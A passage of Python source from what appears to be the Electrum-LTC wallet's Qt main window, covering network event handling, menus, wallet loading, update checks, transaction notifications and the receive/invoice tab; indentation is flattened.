'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum-LTC - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker and wallet.network:
wallet.network.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-LTC Testnet" if constants.net.TESTNET else "Electrum-LTC"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend litecoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_lightning_backup(self):
if self.wallet.is_lightning_backup():
msg = '\n\n'.join([
_("This file is a backup of a lightning wallet."),
_("You will not be able to perform lightning payments using this file, and the lightning balance displayed in this wallet might be outdated.") + ' ' + \
_("If you have lost the original wallet file, you can use this file to trigger a forced closure of your channels."),
_("Do you want to have your channels force-closed?")
])
if self.question(msg, title=_('Lightning Backup')):
self.network.maybe_init_lightning()
self.wallet.lnworker.start_network(self.network)
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Litecoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-ltc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('litecoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Litecoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Litecoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-LTC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
_('The Litecoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
